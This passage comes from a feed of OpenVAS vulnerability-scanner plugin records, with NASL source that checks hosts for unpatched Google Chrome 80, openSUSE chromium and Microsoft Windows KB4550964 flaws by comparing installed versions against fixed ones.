script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:38:44", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2020-02-25T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310816585", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816585", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by 
the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816585\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-25 17:55:24 +0530 (Tue, 25 Feb 2020)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_24-2020-02)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An out of bounds memory access in streams.\n\n - A type confusion in V8.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or crash affected system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 80.0.3987.122\n on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 80.0.3987.122 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"80.0.3987.122\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"80.0.3987.122\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-04T16:37:26", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-02-28T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-03-03T00:00:00", "id": "OPENVAS:1361412562310853048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853048", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either 
version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853048\");\n script_version(\"2020-03-03T07:50:03+0000\");\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-03 07:50:03 +0000 (Tue, 03 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-28 04:01:58 +0000 (Fri, 28 Feb 2020)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2020:0259-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0259-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00033.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2020:0259-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for chromium fixes the following issues:\n\n Chromium was 
updated to version 80.0.3987.122 (bsc#1164828).\n\n Security issues fixed:\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\n Non-security issues fixed:\n\n - Dropped the sandbox binary as it should not be needed anymore\n (bsc#1163588).\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-259=1\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~80.0.3987.122~lp151.2.66.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n 
}\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4550964", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4550964)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310816823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816823", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816823\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0687\", \"CVE-2020-0821\", \"CVE-2020-0889\", \"CVE-2020-0895\",\n \"CVE-2020-0938\", \"CVE-2020-0946\", \"CVE-2020-0952\", \"CVE-2020-0953\",\n \"CVE-2020-0955\", \"CVE-2020-0956\", \"CVE-2020-0957\", \"CVE-2020-0958\",\n \"CVE-2020-0959\", \"CVE-2020-0960\", \"CVE-2020-0962\", \"CVE-2020-0964\",\n \"CVE-2020-0965\", \"CVE-2020-0966\", \"CVE-2020-0967\", \"CVE-2020-0968\",\n \"CVE-2020-0982\", \"CVE-2020-0987\", \"CVE-2020-0988\", \"CVE-2020-0992\",\n \"CVE-2020-0993\", \"CVE-2020-0994\", \"CVE-2020-0995\", \"CVE-2020-0999\",\n \"CVE-2020-1000\", \"CVE-2020-1004\", \"CVE-2020-1005\", \"CVE-2020-1007\",\n \"CVE-2020-1008\", \"CVE-2020-1009\", \"CVE-2020-1011\", \"CVE-2020-1014\",\n \"CVE-2020-1015\", \"CVE-2020-1020\", \"CVE-2020-1027\", \"CVE-2020-1094\",\n \"CVE-2020-0907\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-15 08:39:55 +0530 (Wed, 15 Apr 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4550964)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4550964\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error when the Windows 
kernel improperly handles objects in memory.\n\n - Multiple errors in the way Microsoft Graphics Components handle objects in\n memory.\n\n - Multiple errors when the Windows Jet Database Engine improperly handles\n objects in memory.\n\n - An error in Windows DNS when it fails to properly handle queries.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows an attacker\n to execute arbitrary code on a victim system, disclose sensitive information,\n conduct denial-of-service condition and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows
